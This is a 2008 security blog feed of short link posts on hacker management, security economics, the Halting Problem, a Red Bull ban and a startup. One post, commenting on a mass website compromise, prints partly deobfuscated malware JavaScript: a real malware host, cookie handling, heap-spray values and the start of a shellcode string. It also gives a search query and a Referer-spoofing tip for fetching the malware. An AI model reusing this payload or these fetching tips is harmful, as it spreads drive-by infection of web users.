I am a hacker and you are afraid and that makes you more dangerous than I ever could be.

Everything I needed to know about managing hackers, I learnt from my DVD collection

Topic: Technology
8:22 am EDT, Mar 24, 2008
Many execs will tell you the same thing about their role in the eco-system... but what they miss is that they do not need for this to be a zero sum game. i.e. Achilles does not want to be king, and he certainly doesn't want to concern himself with collecting taxes. He will gladly serve as a soldier to a king who proves himself worthy. This ties in pretty closely to Paul Graham's thoughts on your super hackers and remuneration: "Economically, this is a fact of the greatest importance, because it means you don't have to pay great hackers anything like what they're worth. A great programmer might be ten or a hundred times as productive as an ordinary one, but he'll consider himself lucky to get paid three times as much."
Everything I needed to know about managing hackers, I learnt from my DVD collection

Topic: Miscellaneous
9:37 am EDT, Mar 23, 2008
... and I abuse my admin privileges from time to time :-)

The New School of Information Security

Topic: Technology
8:03 am EDT, Mar 17, 2008
Why is information security so dysfunctional? Are you wasting the money you spend on security? This book shows how to spend it more effectively. How can you make more effective security decisions? This book explains why professionals have taken to studying economics, not cryptography--and why you should, too. And why security breach notices are the best thing to ever happen to information security. It’s about time someone asked the biggest, toughest questions about information security. Security experts Adam Shostack and Andrew Stewart don’t just answer those questions--they offer honest, deeply troubling answers. They explain why these critical problems exist and how to solve them. Drawing on powerful lessons from economics and other disciplines, Shostack and Stewart offer a new way forward. In clear and engaging prose, they shed new light on the critical challenges that are faced by the security field. Whether you’re a CIO, IT manager, or security specialist, this book will open your eyes to new ways of thinking about--and overcoming--your most pressing security challenges. The New School enables you to take control, while others struggle with non-stop crises.
Go Adam! Congrats on getting this out the door! We can exchange signed copies at RSA.

Illogical Arguments in the Name of Alan Turing

Topic: Miscellaneous
11:05 pm EDT, Mar 15, 2008
The case of the Halting Problem is often brought up to suggest that it is impossible to write perfect application security assessment tools. While this is formally true, take the limitations posed upon the abilities of static code analysis tools for example (true, but static code analysis tools are useful regardless, more on this below), I’ve come across numerous situations where people invoke the Halting Problem to form irrational arguments. The conclusions reached in these situations may end up being true, but the arguments are themselves illogical if the premises and inference do not flow into the conclusion.
Interesting tack. Invoking terms incorrectly is something that plagues many industries, including security.

JavaScript from Mass Compromise

Topic: Technology
2:19 pm EDT, Mar 13, 2008
McAfee is talking about a massive website compromise that's using JavaScript to drop malware. The attacker(s) is injecting tags into the title of the pages. McAfee researchers are jackholes who don't want to share the wealth and thus don't provide any links or insight into the code. However, based on the vector the attackers are using (injecting into the <title> tag), the simple Google query intitle: <script src=http will show you the sites that are infected and where you can fetch code. Some of the websites serving the malware require you to spoof a Referer header to receive the actual malware. Here is one example with a little pass through a JavaScript analyzer. http://b.njnk.net:80/E/J.JS
var z1IlbQFl0X = 0;
var z1IlaxFl0X = 0;
var z1IlbPFl0X = 1;
var z1IlbiFl0X = 0;
var z1IlbCFl0X = 0;
var z1IlbHFl0X = 0;
var z1IlbIFl0X = 0;
var z1IlbfFl0X = "use" + "rid1" + "AF9122";
var z1IlbcFl0X = "20";
var z1IlaoFl0X = "a.n" + "jnk." + "net";
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0;
var z1IlaAFl0X = "";
var z1IlanFl0X = 0;
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0;
var z1IlamFl0X = "n" + "one";
var z1IlcqFl0X;
var z1IlaSFl0X = 0;
{
if(z1IlbQFl0X) {
document.getElementsByTagName("bod" + "y") [ 0] .innerHTML += z1IlcFFl0X + "<b" + "r>";
}
}
{
if(z1IlbQFl0X) {
alert(z1IlcFFl0X);
}
}
function x0r1aU2Z(name) {
var z1IlaFFl0X = document.cookie;
var z1IlaJFl0X = name + "=";
if(! z1IlaFFl0X) {
return null;
}
var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
if(z1IlaDFl0X == - 1) {
z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
if(z1IlaDFl0X != 0) {
return null;
}
}
else {
z1IlaDFl0X += 2;
}
var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
if(z1IlbqFl0X == - 1) {
z1IlbqFl0X = z1IlaFFl0X.length;
}
return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));
};
function x0r1aR2Z(name, value) {
var exp = new Date();
var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
exp.setTime(z1IlbVFl0X);
var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
document.cookie = z1IlbYFl0X;
};
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
while(z1IlakFl0X.length * 2 < z1IlalFl0X) {
z1IlakFl0X += z1IlakFl0X;
}
z1IlakFl0X = z1IlakFl0X.substring(0, z1IlalFl0X / 2);
return z1IlakFl0X;
};
function z1IltFl0X() {
if(z1IlaSFl0X > 0) {
return;
}
try {
var z1IlbaFl0X = 0x0c0c0c0c;
var z1IlarFl0X = unescape("%" + "ueb55㍮%" + "u64c" + ... [ Read More (3.0k in body) ]

French ban on Red Bull (drink) upheld by European Court

Topic: Miscellaneous
12:18 pm EDT, Mar 13, 2008
Health concerns over the Red Bull energy drink were fuelled yesterday after Europe's highest court upheld a French ban on the product. The fizzy drink has been linked to several deaths and some experts have criticized its high levels of caffeine and other stimulants. Red Bull is Britain's best-selling energy drink, with 213 million cans consumed last year. It has been dubbed the 'clubbers' drink', and is often mixed with vodka. The popular adverts claiming that Red Bull 'gives you wings', have led to the brand being described as 'the Porsche of soft drinks'.
Red Bull + Vodka = the most self destructive drink evah!

Kaiser, Call girls, and 4 out of 4 stars

Topic: Miscellaneous
8:20 am EDT, Mar 13, 2008
So for the last 24 hours or so I've been flooded with pictures of what a $4300+ call girl looks like. Which led me to wonder what would be involved that costs $4300. Which led me to thinking about my friend Kaiser, whom I met several years back in some of the odd hacker/geek social circles in Atlanta (Billy -> Mike -> Timball -> (Ryan | K | Kaiser | ...)). Kaiser is an odd duck and one of the things he does is apply a zero to 4 star rating to Everything. Taco Cabana? 3 out of 4 stars. Which led me to think about Kaiser's ever elusive 4 out of 4 stars. I only know of 2 things that have received 4 out of 4 stars from Kaiser, and both are on par with the services of a $4300 a night call girl.

Zivity Takes $7 Million In Venture Financing

Topic: Miscellaneous
7:47 am EDT, Mar 13, 2008
Memestreamer Cyan got $7 million in funding for Zivity! The site allows both amateur and professional models and photographers to show their stuff. Users vote on those that they like, which channel real dollars to the talent. The more votes, the more money. The basic site is free, but users must pay to vote. About 40% of gross revenue is given directly to the talent. With a recent redesign, the site is focused much more on social networking - users and talent have profile pages and can add each other as friends. They’ve even added a news feed feature that shows who is adding who as friends, and which models users have voted for.
Go Cyan!